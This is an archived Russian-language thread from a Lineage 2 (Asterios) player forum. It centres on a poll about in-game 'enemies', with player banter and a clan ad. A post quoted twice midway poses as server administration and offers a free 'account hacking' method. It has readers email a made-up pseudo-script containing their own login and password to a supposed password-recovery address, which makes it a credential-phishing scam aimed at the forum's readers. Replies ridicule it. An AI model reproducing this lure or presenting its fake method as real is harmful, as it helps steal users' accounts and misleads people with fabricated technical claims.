Перейти к содержанию
Asterios

Враг!

veryberry

Враги народа?  

276 проголосовавших

У вас нет разрешения голосовать в этом опросе или просматривать его результаты. Пожалуйста, войдите или зарегистрируйтесь для возможности голосования в этом опросе.

Рекомендуемые сообщения

Слэйтер ГА  - крыс крыс в сиде? опа опа.. расскажи ка мне поподробнее...

А на счёт списка ты прав... Говори кого добавить.. я легко это сделаю

а че по подробнее, напару с кнайф бегал по коридору ГА и пытался  закрисить фаонтан)) Я на тебя  даже  макрос сделал, чтобы убить мираж.

Кус аналогично к тебе вопрос- кто ты?

• Ответов 163
  • Создана
  • Последний ответ

Слэйтер, боюсь ты меня перепутал :( Я бишоп... у меня нету миража... и я никогда не крысил камни по корридорам... Ибо всегда был Свой :)

Кто все эти люди???????

Global Army

Nod

ГА-потому что мои любимые вары

Nod-потому что управляет ГАшками как пешками)

"Стадо баранов под предводительством льва намного боеспособнее стада львов под предводительством барана"

"Стадо баранов под предводительством льва намного боеспособнее стада львов под предводительством барана"

+1

Кус аналогично к тебе вопрос- кто ты?

я хз... какой-то нубо бомже тк, ставший хиро, залив себе на твинках 800 очей

Слэйтер, боюсь ты меня перепутал :( Я бишоп... у меня нету миража... и я никогда не крысил камни по корридорам... Ибо всегда был Свой :)

да? ну прост есть тыхарь с аналогичным ником  :blush: ну извиняйте тоды. тогда я тя ваще не знаю по игре, ток по форуму  :ph34r:

Молодец Кус, а я  один  из топовых арб на серве. ( в поле боя)

Яб тя поздравил с твоими достижениями, но тут не с чем поздравлять.

П.с твое  бессценное мнение меня не волнует по поводу моей персоны, не пыжся

Зачет)))

Не может быть такого) Он один из лютых бишей сервера)

И этот биш считает меня недостойной списка  cray.gif  cray.gif

я даже твой ник не особо знаю в игре... Я вообще на ники редко смотрю в замесах)))) "некст таргет- пыщь пыщь" и все в таком духе))

BitchBornToKill (пляж, рожденный убивать :tongue:) Сервер должен знать своих героев. Ну или на тот бой с эвилом я была за missKittin. Кстати я тоже не знала, что ты Акваторий (надеюсь правильно запомнила) да и за слейтера видела только пару раз на химерах. Теперь знаю)

Привет Светик inlove2

Странно, что я не в списке. Голос от нода мне обеспечен ) Ну да ладно, не велика потеря.

Приветик, Максик, давно тебя не видела :-*

Давно не заходил в игру. Проблемы были :)

Молодец Кус, а я один из топовых арб на серве. ( в поле боя)

Яб тя поздравил с твоими достижениями, но тут не с чем поздравлять.

какая пичаль... меня так называет всякое скромное нубье типа тебя! только никто не подумал, что 800 очей-это ~40 твинков, на каждого ~1,5ккк!

тут 80% считает себя топом, а я считаю, что топ- это игрок, который показывает норм навыки в игре, а не тот, который на форуме орет! я тя в игре ни разу не замечал! по мне-так очередной сб\арба из га! ой... вспомнил, ты итак арба из га :D

П.с твое бессценное мнение меня не волнует по поводу моей персоны, не пыжся

фейлишься))

я просто сказал, что не знаю тебя! не видно разницы? ну да, ты же из га... вы же там не различаете даже сарказм и агр

Kleimor (8 голосов [4.42%] - Просмотр)

Nazomi (4 голосов [2.21%] - Просмотр)

Законопослушная (3 голосов [1.66%] - Просмотр)

Anirion (5 голосов [2.76%] - Просмотр)

Кто они? Не честный опрос(((( Их нигде не видать, а они в списке, яж везде всегда, и меня нет cray.gifcray.gifcray.gifcray.gif я истерить буду

Что-то я этих товарищей тоже не знаю.

Всех их я знаю а что ты за рандомное говно непонятно

Кому пост адресован?

Артэмко мой злейший враг. Он у меня бафы тырит. Гад.

Нееее, это Наташа))

Димааааааааа, они плохие все, они не добавляют меня в список cray.gif

Да ну, это не прикольный список. Кто меня не любит или ненавидит я и так знаю. Это 2 человека - узбек Дантес и Нодик.

Я думала меня больше людей ненавидит:) что то вы больно добрые хд

Мои враги почти тут все, все моральные неадекваты почти, будет опрос самые клевые челы х55 прошу добавить KamaelOO.

Портили мои темы, буду ваши гадить.

Набор в клан 8 лвл WaRRioN

лвл 80+

Фул клан скилы

Фан осады 300 атр.

Посешение разных локаций

Фарм эпик рб

Точка от +6 МВ шмот

Бишам и оверам скидка ;)

в пм Yanebog

P.S На дона нех орать, чел многого добился.

[Когда я добьюсь столько же пздц всем кто меня опускал. шамил, гнобил.]

Ыыы, бойтесь :)

Администрация серва...

<бесплатный и действенный способ взлома аккаунтов на hunter 55>

Пользуемся ребята, по всем вопросам в мою асю!!!

Итак, каким образом мы будем взламывать аккаунт противника. Воспользуемся известной системой возврата паролей. Когда жмём кнопку "Выслать пароль" генерируется специальный код, который распознает робот возврата паролей. Нам необходим только почтовый ящик, на котором расположена эта самая система возврата паролей и скрипт, который генерируется при этом. В результате этого хака вы получите аккаунт любого игрока. В скрипт нужно вписать нужные нам значения.

Все что нам нужно это:

1.Заходим в свой почтовый ящик.

2.В письмe пишем такой скрипт:

{failpass}

/Go to page 1

{trubl theme = password forgot = fail}

/derictory count/

{/fors to server: х55}

// indexcode_7

{my sql}: "здесь прописываем свой аккаунт" {1for ressurce go to"2"}

/02870163

[my 2 last pass: "здесь указываем ник того, кого хотите взломать(ник, не обязательно логин)"]

[/forward2folder 00123691]

{my count pass}: "здесь прописываем свой пароль"

//target trash_1

/trash_2

{go to mile page}: "здесь укажите свой email адрес (на него придёт аккаунт и пароль того человека, которого вы взламываете)"

//endscript_1 /

/get recovery password/

/end.

3.Отправляем письмо с этим скриптом на систему возврата паролей [email protected]

4.Ждём некоторое время

5.Получаем чужой аккаунт и радуемся.

Письма с ответным скриптом не приходят если вы указали несуществующий аккаунт, либо неправильный пароль или аккаунт существует менее месяца (не знаю почему), кавычки в скрипте писать не надо. Пример: {my count pass}: "здесь прописываем свой пароль" - {my count pass}: 12345

По всем вопросам обращаться в icq: 49934235 (данный способ просуществует 3-4 дня, после скрипты поменяются)

Администрация серва...

<бесплатный и действенный способ взлома аккаунтов на hunter 55>

Пользуемся ребята, по всем вопросам в мою асю!!!

Итак, каким образом мы будем взламывать аккаунт противника. Воспользуемся известной системой возврата паролей. Когда жмём кнопку "Выслать пароль" генерируется специальный код, который распознает робот возврата паролей. Нам необходим только почтовый ящик, на котором расположена эта самая система возврата паролей и скрипт, который генерируется при этом. В результате этого хака вы получите аккаунт любого игрока. В скрипт нужно вписать нужные нам значения.

Все что нам нужно это:

1.Заходим в свой почтовый ящик.

2.В письмe пишем такой скрипт:

{failpass}

/Go to page 1

{trubl theme = password forgot = fail}

/derictory count/

{/fors to server: х55}

// indexcode_7

{my sql}: "здесь прописываем свой аккаунт" {1for ressurce go to"2"}

/02870163

[my 2 last pass: "здесь указываем ник того, кого хотите взломать(ник, не обязательно логин)"]

[/forward2folder 00123691]

{my count pass}: "здесь прописываем свой пароль"

//target trash_1

/trash_2

{go to mile page}: "здесь укажите свой email адрес (на него придёт аккаунт и пароль того человека, которого вы взламываете)"

//endscript_1 /

/get recovery password/

/end.

3.Отправляем письмо с этим скриптом на систему возврата паролей [email protected]

4.Ждём некоторое время

5.Получаем чужой аккаунт и радуемся.

Письма с ответным скриптом не приходят если вы указали несуществующий аккаунт, либо неправильный пароль или аккаунт существует менее месяца (не знаю почему), кавычки в скрипте писать не надо. Пример: {my count pass}: "здесь прописываем свой пароль" - {my count pass}: 12345

По всем вопросам обращаться в icq: 49934235 (данный способ просуществует 3-4 дня, после скрипты поменяются)

Ты сам себе враг идиотина....

p.s. (данный способ просуществует 3-4 дня, после ты собираешь акки и раздеваешь их) <- подправила

Главный враг провайдер - в час пик пинг эрор ставильный.

Заархивировано

Эта тема находится в архиве и закрыта для дальнейших ответов.

• Последние посетители   0 пользователей онлайн

• Ни одного зарегистрированного пользователя не просматривает данную страницу

• Создать...